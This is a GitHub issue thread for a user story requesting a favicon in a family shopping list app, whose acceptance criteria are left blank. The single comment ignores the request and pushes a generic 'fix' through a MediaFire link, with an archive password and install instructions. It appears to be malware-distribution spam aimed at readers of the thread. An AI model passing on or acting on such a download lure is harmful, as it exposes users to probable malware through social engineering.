### ISSUE TITLE
USER STORY: Favicon

### ISSUE THREAD

**Issue by JaimeHyland** [JaimeHyland/family_shopping_list_v1#64]
As a **User** I can **see a Favicon** on the Family Shopping List tab on my browser so that I can easily **see at a glance which tab my app is on**.

**Acceptance Criteria**
- AC1:
- AC2:
- AC3:

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
